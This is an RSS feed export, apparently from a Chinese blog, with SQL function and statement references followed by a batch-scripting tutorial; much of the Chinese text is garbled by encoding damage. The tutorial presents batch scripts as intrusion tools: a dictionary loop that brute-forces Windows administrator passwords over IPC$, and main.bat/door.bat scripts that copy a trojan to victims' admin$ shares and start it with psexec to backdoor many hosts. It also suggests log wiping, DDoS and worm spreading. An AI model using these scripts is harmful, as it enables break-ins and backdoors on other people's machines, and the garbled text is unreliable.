�??xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>&#x4E9A;&#x6D32;&#x7CBE;&#x54C1;&#x4F26;&#x7406;&#x719F;&#x5973;&#x56FD;&#x4EA7;&#x4E00;&#x533A;&#x4E8C;&#x533A;&#x2C;&#x4E9A;&#x6D32;&#x65E5;&#x97E9;&#x5728;&#x7EBF;&#x7B2C;&#x4E00;&#x9875;&#x2C;&#x4E9A;&#x6D32;&#x4A;&#x4C;&#x5A;&#x5A;&#x4A;&#x4C;&#x5A;&#x5A;&#x5C11;&#x5987;</title><link>http://m.tkk7.com/zgghc/category/12610.html</link><description>天冷 冷不了我的心 
心痛 痛不断我的情 
  情深 深得像�v  
   ��?仰望蓝天 
   �?一轮明�?
   �?为我而牧 </description><language>zh-cn</language><lastBuildDate>Tue, 27 Feb 2007 21:14:16 GMT</lastBuildDate><pubDate>Tue, 27 Feb 2007 21:14:16 GMT</pubDate><ttl>60</ttl><item><title>SQL 数据库中的函�?/title><link>http://m.tkk7.com/zgghc/articles/56688.html</link><dc:creator>牧月�?/dc:creator><author>牧月�?/author><pubDate>Wed, 05 Jul 2006 04:11:00 GMT</pubDate><guid>http://m.tkk7.com/zgghc/articles/56688.html</guid><wfw:comment>http://m.tkk7.com/zgghc/comments/56688.html</wfw:comment><comments>http://m.tkk7.com/zgghc/articles/56688.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.tkk7.com/zgghc/comments/commentRss/56688.html</wfw:commentRss><trackback:ping>http://m.tkk7.com/zgghc/services/trackbacks/56688.html</trackback:ping><description><![CDATA[----�l�计函数---- 
AVG　　--求��^均�?
COUNT　 --�l�计数目
MAX　　--求最大�?
MIN　　--求最����?
SUM　　--求和

--AVG
use pangu
select avg(e_wage) as dept_avgWage
from employee
group by dept_id

--MAX
--求工资最高的员工姓名 
use pangu 
select e_name 
from employee 
where e_wage =C
(select max(e_wage)
　from employee)

--STDEV()
--STDEV()函数�q�回表达式中所有数据的标准�?

--STDEVP()
--STDEVP()函数�q�回��M��标准�?
--VAR()
--VAR()函数�q�回表达式中所有值的�l�计变异�?
--VARP()
--VARP()函数�q�回��M��变异�?

----���术函数----
/***三角函数***/ 
SIN(float_expression) --�q�回以弧度表�C�的角的正��u
COS(float_expression) --�q�回以弧度表�C�的角的余��u
TAN(float_expression) --�q�回以弧度表�C�的角的正切
COT(float_expression) --�q�回以弧度表�C�的角的余切
/***反三角函�?**/
ASIN(float_expression) --�q�回正��u是FLOAT 值的以弧度表�C�的�?
ACOS(float_expression) --�q�回余��u是FLOAT 值的以弧度表�C�的�?
ATAN(float_expression) --�q�回正切是FLOAT 值的以弧度表�C�的�?
ATAN2(float_expression1,float_expression2)
　　　　--�q�回正切是float_expression1 /float_expres-sion2的以弧度表示的角
DEGREES(numeric_expression)
　　　　　　　　　　　 --把弧度�{换�ؓ角度�q�回与表辑ּ�相同的数据类型可�?
　　　　--INTEGER/MONEY/REAL/FLOAT �c�d��
RADIANS(numeric_expression) --把角度�{换�ؓ弧度�q�回与表辑ּ�相同的数据类型可�?
　　　　--INTEGER/MONEY/REAL/FLOAT �c�d��
EXP(float_expression)　--�q�回表达式的指数�?
LOG(float_expression)　--�q�回表达式的自然�Ҏ���?
LOG10(float_expression)--�q�回表达式的�?0 为底的对数�?
SQRT(float_expression) --�q�回表达式的�q�x���?
/***取近似值函�?**/
CEILING(numeric_expression)　--�q�回>=表达式的最���整数返回的数据�c�d��与表辑ּ�相同可�ؓ
　　　　--INTEGER/MONEY/REAL/FLOAT �c�d��
FLOOR(numeric_expression)　　--�q�回<=表达式的最���整数返回的数据�c�d��与表辑ּ�相同可�ؓ 
　　　　--INTEGER/MONEY/REAL/FLOAT �c�d��
ROUND(numeric_expression)　　--�q�回以integer_expression 为精度的四舍五入��D��回的数据
　　　　--�c�d��与表辑ּ�相同可�ؓINTEGER/MONEY/REAL/FLOAT �c�d��
ABS(numeric_expression)　　　--�q�回表达式的�l�对��D��回的数据�c�d��与表辑ּ�相同可�ؓ
　　　　--INTEGER/MONEY/REAL/FLOAT �c�d��
SIGN(numeric_expression)　　 --���试参数的正负号�q�回0 零�? 正数�?1 负数�q�回的数据类�?
　　　　--与表辑ּ�相同可�ؓINTEGER/MONEY/REAL/FLOAT �c�d��
PI()　　　 --�q�回��gؓπ �?.1415926535897936
RAND([integer_expression])　 --用�Q选的[integer_expression]做种子值得�?-1 间的随机���点�?

----字符串函�?---
ASCII()　　　　 --函数�q�回字符表达式最左端字符的ASCII 码�?
CHAR()　 --函数用于���ASCII 码�{换�ؓ字符
　　--如果没有输入0 ~ 255 之间的ASCII 码值CHAR 函数会返回一个NULL �?
LOWER()　 --函数把字�W�串全部转换为小�?
UPPER()　 --函数把字�W�串全部转换为大�?
STR()　 --函数把数值型数据转换为字�W�型数据
LTRIM()　 --函数把字�W�串头部的空格去�?
RTRIM()　 --函数把字�W�串���N��的空格去�?
LEFT(),RIGHT(),SUBSTRING()　--函数�q�回部分字符�?
CHARINDEX(),PATINDEX()　--函数�q�回字符串中某个指定的子串出现的开始位�|?
SOUNDEX()　--函数�q�回一个四位字�W�码C
　　--SOUNDEX函数可用来查扑֣�音相似的字符串但SOUNDEX函数�Ҏ��字和汉字均只�q�回0 �?
DIFFERENCE()　　--函数�q�回由SOUNDEX 函数�q�回的两个字�W�表辑ּ�的值的差异
　　--0 两个SOUNDEX 函数�q�回值的�W�一个字�W�不�?
　　--1 两个SOUNDEX 函数�q�回值的�W�一个字�W�相�?
　　--2 两个SOUNDEX 函数�q�回值的�W�一二个字符相同
　　--3 两个SOUNDEX 函数�q�回值的�W�一二三个字�W�相�?
　　--4 两个SOUNDEX 函数�q�回值完全相�?
　　　　　　　　　　　　　　　　　　　 

QUOTENAME()　--函数�q�回被特定字�W�括��h��的字�W�串
/*select quotename(’abc�? ’{�? quotename(’abc�?
�q�行�l�果如下
----------------------------------{
{abc} [abc]*/

REPLICATE()　　 --函数�q�回一个重复character_expression 指定�ơ数的字�W�串
/*select replicate(’abc�? 3) replicate( ’abc�? -2)
�q�行�l�果如下
----------- -----------
abcabcabc NULL*/

REVERSE()　　　 --函数���指定的字符串的字符排列��序颠�?
REPLACE()　　　 --函数�q�回被替换了指定子串的字�W�串
/*select replace(’abc123g�? �?23�? ’def�?
�q�行�l�果如下
----------- -----------
abcdefg*/

SPACE()　 --函数�q�回一个有指定长度的空白字�W�串
STUFF()　 --函数用另一子串替换字符串指定位�|�长度的子串

----数据�c�d��转换函数----
CAST() 函数语法如下
CAST() (<expression> AS <data_ type>[ length ])
CONVERT() 函数语法如下
CONVERT() (<data_ type>[ length ], <expression> [, style]) 

select cast(100+99 as char) convert(varchar(12), getdate())
�q�行�l�果如下
------------------------------ ------------ 
199　 Jan 15 2000 

----日期函数----
DAY()　 --函数�q�回date_expression 中的日期�?
MONTH()　 --函数�q�回date_expression 中的月䆾�?
YEAR()　 --函数�q�回date_expression 中的�q�䆾�?
DATEADD(<datepart> ,<number> ,<date>) 
　　--函数�q�回指定日期date 加上指定的额外日期间隔number 产生的新日期
DATEDIFF(<datepart> ,<number> ,<date>) 
　　--函数�q�回两个指定日期在datepart 斚w��的不同之�?
DATENAME(<datepart> , <date>)　--函数以字�W�串的�Ş式返回日期的指定部分
DATEPART(<datepart> , <date>)　--函数以整数值的形式�q�回日期的指定部�?
GETDATE()　--函数以DATETIME 的缺省格式返回系�l�当前的日期和时�?

----�pȝ��函数---- 
APP_NAME()　　　--函数�q�回当前执行的应用程序的名称 
<img src ="http://m.tkk7.com/zgghc/aggbug/56688.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.tkk7.com/zgghc/" target="_blank">牧月�?/a> 2006-07-05 12:11 <a href="http://m.tkk7.com/zgghc/articles/56688.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>SQL数据库语句大全集�?/title><link>http://m.tkk7.com/zgghc/articles/56687.html</link><dc:creator>牧月�?/dc:creator><author>牧月�?/author><pubDate>Wed, 05 Jul 2006 04:10:00 GMT</pubDate><guid>http://m.tkk7.com/zgghc/articles/56687.html</guid><wfw:comment>http://m.tkk7.com/zgghc/comments/56687.html</wfw:comment><comments>http://m.tkk7.com/zgghc/articles/56687.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://m.tkk7.com/zgghc/comments/commentRss/56687.html</wfw:commentRss><trackback:ping>http://m.tkk7.com/zgghc/services/trackbacks/56687.html</trackback:ping><description><![CDATA[--�?句　　　　　　　　　　　　　　�?�?
--数据操作
SELECT　　　--从数据库表中���索数据行和列
INSERT　　　--向数据库表添加新数据�?
DELETE　　　--从数据库表中删除数据�?
UPDATE　　　--更新数据库表中的数据 
--数据定义 
CREATE TABLE　　--创徏一个数据库�?
DROP TABLE　　 --从数据库中删除表 
ALTER TABLE　　 --修改数据库表�l�构
CREATE VIEW　　 --创徏一个视�?
DROP VIEW　　 --从数据库中删除视�?
CREATE INDEX　　--为数据库表创��Z��个烦�?
DROP INDEX　　 --从数据库中删除烦�?
CREATE PROCEDURE　 --创徏一个存储过�E?
DROP PROCEDURE　　--从数据库中删除存储过�E?
CREATE TRIGGER　　--创徏一个触发器 
DROP TRIGGER　　--从数据库中删除触发器
CREATE SCHEMA　　--向数据库��d��一个新模式
DROP SCHEMA　　 --从数据库中删除一个模�?
CREATE DOMAIN　　--创徏一个数据值域
ALTER DOMAIN　　--改变域定�?
DROP DOMAIN　　 --从数据库中删除一个域
--数据控制 
GRANT　　　--授予用户讉K��权限
DENY　　　--拒绝用户讉K�� 
REVOKE　　　--解除用户讉K��权限
--事务控制
COMMIT　　　--�l�束当前事务
ROLLBACK　　 --中止当前事务 
SET TRANSACTION　　--定义当前事务数据讉K��特征
--�E�序化SQL 
DECLARE　　　--为查询设定游�?
EXPLAN　　　--为查询描�q�数据访问计�?
OPEN　　　--���索查询结果打开一个游�?
FETCH　　　--���索一行查询结�?
CLOSE　　　--关闭游标
PREPARE　　　--为动态执行准备SQL 语句 
EXECUTE　　　--动态地执行SQL 语句
DESCRIBE　　 --描述准备好的查询 
---局部变�?
declare @id char(10) 
--set @id = �?0010001�?
select @id = �?0010001�?
---全局变量 
---必须以@@开�?

--IF ELSE
declare @x int @y int @z int
select @x = 1 @y = 2 @z=3
if @x > @y
print ’x > y�?--打印字符东y��x > y�?
else if @y > @z 
print ’y > z�?
else print ’z > y�?

--CASE 
use pangu 
update employee
set e_wage =
case
　when job_level = �?�?then e_wage*1.08
　when job_level = �?�?then e_wage*1.07
　when job_level = �?�?then e_wage*1.06
　else e_wage*1.05
end 
--WHILE CONTINUE BREAK
declare @x int @y int @c int
select @x = 1 @y=1
while @x < 3 
begin
　print @x --打印变量x 的�?
　while @y < 3 
　 begin
　　select @c = 100*@x + @y
　　print @c --打印变量c 的�?
　　select @y = @y + 1
　 end
　select @x = @x + 1
　select @y = 1
end 
--WAITFOR 
--�?�{�待1 ���时2 分零3 �U�后才执行SELECT 语句
waitfor delay �?1:02:03�?
select * from employee
--�?�{�到晚上11 炚w��8 分后才执行SELECT 语句
waitfor time �?3:08:00�?
select * from employee 
***SELECT*** 

　 select *(列名) from table_name(表名) where column_name operator value 
　 ex:(宿主) 
　select * from stock_information where stockid　 = str(nid)
　　 stockname = ’str_name�?
　　 stockname like �? find this %�?
　　 stockname like ’[a-zA-Z]%�?--------- ([]指定值的范围) 
　　 stockname like ’[^F-M]%’　 --------- (^排除指定范围) 
　　 --------- 只能在��用like关键字的where子句中��用通配�W?
　　 or stockpath = ’stock_path�?
　　 or stocknumber < 1000
　　 and stockindex = 24
　　 not stocksex = ’man�?
　　 stocknumber between 20 and 100
　　 stocknumber in(10,20,30) 
　　 order by stockid desc(asc) --------- 排序�Q�desc-降序�Q�asc-升序 
　　 order by 1,2 --------- by列号
　　 stockname = (select stockname from stock_information　where stockid　= 4) 
　　 --------- 子查�?http://www.acnow.net/ oYIpsxSPAIC
　　 --------- 除非能确保内层select只返回一个行的��|��
　　 --------- 否则应在外层where子句中用一个in限定�W?
　select distinct column_name form table_name --------- distinct指定���索独有的列��|��不重�?
　select stocknumber ,"stocknumber + 10" = stocknumber + 10 from table_name 
select stockname , "stocknumber" = count(*) from table_name group by stockname 
　　　　　　　　--------- group by ���表按行分组,指定列中有相同的�?
　　　　　having count(*) = 2　---------　having选定指定的组
　select *　from table1, table2　　
　where table1.id *= table2.id -------- 左外部连接，table1中有的而table2中没有得以null表示
　　 table1.id =* table2.id -------- 叛_��部连�?

　select stockname from table1 
　union [all]　-----　union合�ƈ查询�l�果集，all-保留重复�?
　select stockname from table2

***insert***

　insert into table_name (Stock_name,Stock_number) value ("xxx","xxxx")
　　　　　　　value (select Stockname , Stocknumber from Stock_table2)---value为select语句

***update***

　update table_name set Stockname = "xxx" [where Stockid = 3]
　　　　 Stockname = default
　　　　 Stockname = null
　　　　 Stocknumber = Stockname + 4

***delete*** 

　delete from table_name where Stockid = 3 
　truncate table_name ----------- 删除表中所有行�Q�仍保持表的完整�?
　drop table table_name --------------- 完全删除�?

***alter table*** --- 修改数据库表�l�构 

　alter table database.owner.table_name add column_name char(2) null ..... 
　sp_help table_name ---- 昄���表已有特�?
　create table table_name (name char(20), age smallint, lname varchar(30))
　insert into table_name select ......... ----- 实现删除列的�Ҏ���Q�创建新表）
　alter table table_name drop constraint Stockname_default ---- 删除Stockname的default�U�束
<img src ="http://m.tkk7.com/zgghc/aggbug/56687.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.tkk7.com/zgghc/" target="_blank">牧月�?/a> 2006-07-05 12:10 <a href="http://m.tkk7.com/zgghc/articles/56687.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>批处理教�E?/title><link>http://m.tkk7.com/zgghc/articles/55686.html</link><dc:creator>牧月�?/dc:creator><author>牧月�?/author><pubDate>Thu, 29 Jun 2006 02:24:00 GMT</pubDate><guid>http://m.tkk7.com/zgghc/articles/55686.html</guid><wfw:comment>http://m.tkk7.com/zgghc/comments/55686.html</wfw:comment><comments>http://m.tkk7.com/zgghc/articles/55686.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.tkk7.com/zgghc/comments/commentRss/55686.html</wfw:commentRss><trackback:ping>http://m.tkk7.com/zgghc/services/trackbacks/55686.html</trackback:ping><description><![CDATA[最�q�对于批处理技术的探讨比较热，也有不少好的批处理程序发布，但是如果没有一定的相关知识恐怕不�Ҏ��看懂和理解这些批处理文�g�Q�也���更谈不上自己动手编写了�Q�古语云�Q�“授��Z����|��不如授�h以渔。”因为网上好像�ƈ没有一个比较完整的教材,所以抽一�Ҏ��间写了这�?<���明批处理教程>>�l�新手朋友们.也献�l�所有�ؓ实现�|�络的自�׃���׃�n而努力的朋友�?

批处理文件是无格式的文本文�g�Q�它包含一条或多条命��o。它的文件扩展名�?.bat �?.cmd。在命��o提示下键入批处理文�g的名�U�ͼ�或者双击该批处理文�Ӟ���pȝ����׃��调用Cmd.exe按照该文件中各个命��o出现的顺序来逐个�q�行它们。��用批处理文�g�Q�也被称为批处理�E�序或脚本）�Q�可以简化日常或重复性�Q务。当然我们的�q�个版本的主要内�Ҏ��介绍批处理在入��R中一些实际运用，例如我们后面要提到的用批处理文�g来给�pȝ��打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧�?

一.���单批处理内部命��o����?
1.Echo 命��o
打开回显或关闭请求回昑֊�能，或显�C�消息。如果没有�Q何参敎ͼ�echo 命��o���显�C�当前回显设�|��?
语法
echo [{on|off}] [message]
Sample�Q�@echo off / echo hello world
在实际应用中我们会把�q�条命��o和重定向�W�号�Q�也�U�Cؓ���道�W�号�Q�一般用> >> ^�Q�结合来实现输入一些命令到特定格式的文件中.�q�将在以后的例子中体现出来�?

2.@ 命��o
表示不显�C�@后面的命令，在入侵过�E�中�Q�例如��用批处理来格式化敌�h的硬盘）自然不能让对方看��C��使用的命令啦�?
Sample�Q�@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format �q�个命��o是不可以使用/y�q�个参数的，可喜的是微��Y留了个autoset�q�个参数�l�我们，效果�?y是一��L���?

3.Goto 命��o
指定跌��{到标�{�，扑ֈ�标签后，�E�序���处理从下一行开始的命��o�?
语法�Q�goto label �Q�label是参敎ͼ�指定所要�{向的批处理程序中的行。） 
Sample�Q?
if {%1}=={} goto noparms
if {%2}=={} goto noparms�Q�如果这里的if�?1�?2你不明白的话�Q�先跌���去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便�v�Q�但是最好是有意义的字母啦，字母前加个：用来表示�q�个字母是标�{�，goto命��o���是�Ҏ���q�个�Q�来��L��下一步蟩到到那里。最好有一些说明这样你别�h看�v来才会理解你的意囑֕��?

4.Rem 命��o
注释命��o�Q�在C语言中相当与/*--------*/,它�ƈ不会被执行，只是起一个注释的作用�Q�便于别人阅��d��你自己日后修攏V�?
Rem Message
Sample�Q�@Rem Here is the description.

5.Pause 命��o
�q�行 Pause 命��o�Ӟ�����显�C�Z��面的消息�Q?
Press any key to continue . . . 
Sample�Q?
@echo off 
:begin 
copy a:*.* d�Q�\back
echo Please put a new disk into driver A 
pause 
goto begin 
在这个例子中�Q�驱动器 A 中磁盘上的所有文件均复制到d:\back中。显�C�的注释提示您将另一张磁盘放入驱动器 A �Ӟ��pause 命��o会�ɽE�序挂�v�Q�以便您更换���盘�Q�然后按��L��键���l�处理�?

6.Call 命��o
从一个批处理�E�序调用另一个批处理�E�序�Q��ƈ且不�l�止父批处理�E�序。call 命��o接受用作调用目标的标�{�。如果在脚本或批处理文�g外���?Call�Q�它���不会在命��o行�v作用�?
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName 
指定要调用的批处理程序的位置和名�U�。filename 参数必须��h�� .bat �?.cmd 扩展名�?

7.start 命��o
调用外部�E�序�Q�所有的DOS命��o和命令行�E�序都可以由start命��o来调用�?
入��R常用参数�Q?
MIN 开始时�H�口最���化
SEPARATE 在分开的空间内开�?16 �?Windows �E�序
HIGH �?HIGH 优先�U�类别开始应用程�?
REALTIME �?REALTIME 优先�U�类别开始应用程�?
WAIT 启动应用�E�序�q�等候它�l�束
parameters �q�些��Z��送到命��o/�E�序的参�?
执行的应用程序是 32-�?GUI 应用�E�序�Ӟ��CMD.EXE 不等应用�E�序�l�止���p��回命令提�C�。如果在命��o脚本内执行，该新行�ؓ则不会发生�?
8.choice 命��o
choice 使用此命令可以让用户输入一个字�W�，从而运行不同的命��o。��用时应该�?c:参数�Q�c:后应写提�C�可输入的字�W�，之间无空根{��它的返回码�?234…�?
�? choice /c:dme defrag,mem,end
���显�C?
defrag,mem,end[D,M,E]?
Sample�Q?
Sample.bat的内容如�? 
@echo off 
choice /c:dme defrag,mem,end 
if errorlevel 3 goto defrag �Q�应先判断数值最高的错误码）
if errorlevel 2 goto mem 
if errotlevel 1 goto end

:defrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye

此文件运行后�Q�将昄��� defrag,mem,end[D,M,E]? 用户可选择d m e �Q�然后if语句���作出判断，d表示执行标号为defrag的程序段�Q�m表示执行标号为mem的程序段�Q�e表示执行标号为end的程序段�Q�每个程序段最后都以goto end���程序蟩到end标号处，然后�E�序���显�C�good bye�Q�文件结束�?

9.If 命��o

if 表示���判断是否符合规定的条�g�Q�从而决定执行不同的命��o�?有三�U�格�? 
1、if "参数" == "字符�? 　待执行的命��o 
参数如果�{�于指定的字�W�串�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?注意是两个等��P��
如if "%1"=="a" format a: 
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文�g名　 待执行的命��o 
如果有指定的文�g�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?
如if exist config.sys edit config.sys 

3、if errorlevel / if not errorlevel 数字　 待执行的命��o 
如果�q�回码等于指定的数字�Q�则条�g成立�Q�运行命令，否则�q�行下一句�?
如if errorlevel 2 goto x2 　
DOS�E�序�q�行旉���会返回一个数字给DOS�Q�称为错误码errorlevel或称�q�回码，常见的返回码�?�?�?

10.for 命��o
for 命��o是一个比较复杂的命��o�Q�主要用于参数在指定的范围内循环执行命��o�?
在批处理文�g中���?FOR 命��o�Ӟ��指定变量请���?%%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数�?
(set) 指定一个或一�l�文件。可以��用通配�W��?
command 指定�Ҏ��个文件执行的命��o�?
command-parameters 为特定命令指定参数或命��o行开兟�?
在批处理文�g中���?FOR 命��o�Ӟ��指定变量请���?%%variable
而不要用 %variable。变量名�U�是区分大小写的�Q�所�?%i 不同�?%I

如果命��o扩展名被启用�Q�下列额外的 FOR 命��o格式会受�?
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配�W�，则指定与目录名匹配，而不与文�?
名匹配�?

FOR /R [[drive:]path] %variable IN (set) DO command [command-

���查以 [drive:]path 为根的目录树�Q�指向每个目录中�?
FOR 语句。如果在 /R 后没有指定目录，则��用当�?
目录。如果集仅�ؓ一个单�?.)字符�Q�则枚�D该目录树�?

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量�Ş式从开始到�l�束的一个数字序列�?
因此�Q?1,1,5) �����生序�?1 2 3 4 5�Q?5,-1,1) ������?
序列 (5 4 3 2 1)�?

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command


或者，如果�?usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command 
FOR /F ["options"] %variable IN ("string") DO command 
FOR /F ["options"] %variable IN ('command') DO command 

filenameset ��Z��个或多个文�g名。���l�到 filenameset 中的
下一个文件之前，每䆾文�g都已被打开、读取�ƈ�l�过处理�?
处理包括��d��文�g�Q�将其分成一行行的文字，然后���每�?
解析成零或更多的�W�号。然后用已找到的�W�号字符串变量�?
调用 For 循环。以默认方式�Q?F 通过每个文�g的每一行中分开
的第一个空白符受���蟩�q�空白行。您可通过指定可�?"options"
参数替代默认解析操作。这个带引号的字�W�串包括一个或多个
指定不同解析选项的关键字。这些关键字�?

eol=c - 指一个行注释字符的结��?��׃���?
skip=n - 指在文�g开始时忽略的行数�?
delims=xxx - 指分隔符集。这个替换了�I�格和蟩格键�?
默认分隔�W�集�?
tokens=x,y,m-n - 指每行的哪一个符可���传递到每个�q�代
�?for 本��n。这会导致额外变量名�U�的
格式��Z��个范围。通过 nth �W�号指定 m
�W�号字符串中的最后一个字�W�星��P��
那么额外的变量将在最后一个符可���析之
分配�q�接受行的保留文本�?
usebackq - 指定新语法已在下�c�L��况中使用:
在作为命令执行一个后引号的字�W�串�q�且
引号字符为文字字�W�串命��o�q�允许在 fi
中��用双引号扩�v文�g名称�?

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分�?myfile.txt 中的每一行，忽略以分��h��头的那些行，��?
每行中的�W�二个和�W�三个符号传递给 for �E�序体；用逗号�?�?
�I�格定界�W�号。请注意�Q�这�?for �E�序体的语句引用 %i �?
取得�W�二个符��P��引用 %j 来取得第三个�W�号�Q�引�?%k
来取得第三个�W�号后的所有剩余符受���对于带有空格的文�g
名，您需要用双引号将文�g名括��h��。�ؓ了用�q�种方式来��
用双引号�Q�您�q�需要���?usebackq 选项�Q�否则，双引号会
被理解成是用作定义某个要分析的字�W�串的�?

%i 专门�?for 语句中得到说明，%j �?%k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一�?
指定最�?26 个符��P��只要不试图说明一个高于字�?'z' �?
'Z' 的变量。请��C���Q�FOR 变量是单一字母、分大小写和全局的；
同时不能�?52 个以上都在��用中�?

您还可以在相��d���W�串上���?FOR /F 分析逻辑�Q�方法是�Q?
用单引号���括号之间的 filenameset 括�v来。这��P��该字�W?
串会被当作一个文件中的一个单一输入行�?

最后，您可以用 FOR /F 命��o来分析命令的输出。方法是�Q�将
括号之间�?filenameset 变成一个反括字�W�串。该字符串会
被当作命令行�Q�传递到一个子 CMD.EXE�Q�其输出会被抓进
内存�Q��ƈ被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚丑ֽ�前环境中的环境变量名�U��?

另外�Q�FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I - 删除��M��引号(")�Q�扩�?%I
%~fI - ��?%I 扩充��C��个完全合格的路径�?
%~dI - 仅将 %I 扩充��C��个驱动器�?
%~pI - 仅将 %I 扩充��C��个�\�?
%~nI - 仅将 %I 扩充��C��个文件名
%~xI - 仅将 %I 扩充��C��个文件扩展名
%~sI - 扩充的�\径只含有短名
%~aI - ��?%I 扩充到文件的文�g属�?
%~tI - ��?%I 扩充到文件的日期/旉���
%~zI - ��?%I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个完全合格的名称。如果环境变�?
未被定义�Q�或者没有找到文�Ӟ��此组合键会扩�?
�I�字�W�串

可以�l�合修饰�W�来得到多重�l�果:

%~dpI - 仅将 %I 扩充��C��个驱动器号和路径
%~nxI - 仅将 %I 扩充��C��个文件名和扩展名
%~fsI - 仅将 %I 扩充��C��个带有短名的完整路径�?
%~dp$PATH:i - 查找列在路径环境变量的目录，�q�将 %I 扩充
到找到的�W�一个驱动器号和路径�?
%~ftzaI - ��?%I 扩充到类��D��出线路的 DIR
在以上例子中�Q?I �?PATH 可用其他有效数��g���ѝ�?~ 语法
用一个有效的 FOR 变量名终止。选取�c�M�� %I 的大写变量名
比较易读�Q�而且避免与不分大���写的组合键��h���?

以上是MS的官方帮助，下面我们丑և�个例子来具体说明一下For命��o在入侵中的用途�?

sample2�Q?

利用For命��o来实现对一台目标Win2k��L��的暴力密码破解�?
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主�����行连接，当成功时��C��密码�?
最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表�C�admin的密码，在dict.txt中这个取i%的值用net use 命��o来连接。然后将�E�序�q�行�l�果传递给find命��o�Q�－
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命��o成功完成">>D:\ok.txt �Q�这样就ko了�?

sample3�Q?

你有没有�q�手里有大量肉鸡�{�着你去�U�后门＋木马呢？�Q�当数量特别多的时候，原本很开心的一件事都会变得很郁��P���Q�。文章开头就谈到使用批处理文�Ӟ��可以���化日常或重复性�Q务。那么如何实现呢�Q�呵呵，看下��M����׃��明白了�?

主要命��o也只有一条：�Q�在批处理文件中使用 FOR 命��o�Ӟ��指定变量使用 %%variable�Q?
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1�Q�在�q�里它表�C�按��序���victim.txt中的内容传递给door.bat中的参数%i %j %k�?
而cultivate.bat无非���是用net use命��o来徏立IPC$�q�接�Q��ƈcopy木马�Q�后门到victim�Q�然后用�q�回码（If errorlever =�Q�来�{�选成功种植后门的��L���Q��ƈecho出来�Q�或者echo到指定的文�g�?
delims= 表示vivtim.txt中的内容是一�I�格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根�?%i %%j %%k表示的对象来排列�Q�一般就�?ip password username�?
代码雏�Ş�Q?
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------


------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt 
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
�q�只是一个自动种植后门批处理的雏形，两个批处理和后门�E�序�Q�Windrv32.exe�Q?PSexec.exe需攑֜��l�一目录�?批处理内�?
���可扩展,例如:加入清除日志+DDOS的功�?加入定时��d��用户的功�?更深入一点可以��之具备自动传播功�?蠕虫).此处不多做叙�q?有兴���的朋友可自行研�I?



ps:一.如何在批处理文�g中��用参�?
批处理中可以使用参数�Q�一般从1%�?9%�q�九个，当有多个参数旉���要用shift来移动，�q�种情况�q�不多见�Q�我们就不考虑它了�?
sample1�Q�fomat.bat 
@echo off 
if "%1"=="a" format a: 
:format 
@format a:/q/u/auotset 
@echo please insert another disk to driver A. 
@pause 
@goto fomat 
�q�个例子用于�q�箋地格式化几张软盘�Q�所以用的时候需在dos�H�口输入fomat.bat a�Q�呵�?好像有点画蛇添��了～^_^ 
sample2�Q?
当我们要建立一个IPC$�q�接地时候总要输入一大串命��o�Q�弄不好���打错了�Q�所以我们不如把一些固定命令写入一个批处理�Q�把肉鸡地ip password username 当着参数来赋�l�这个批处理�Q�这样就不用每次都打命��o了�?
@echo off 
